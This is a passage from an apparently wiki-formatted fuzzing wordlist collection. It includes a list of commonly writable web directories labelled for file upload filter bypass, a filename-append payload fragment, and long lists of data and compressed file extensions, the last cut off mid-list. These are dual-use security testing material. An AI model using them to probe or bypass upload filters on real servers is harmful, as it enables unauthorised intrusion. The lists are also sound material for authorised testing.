{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
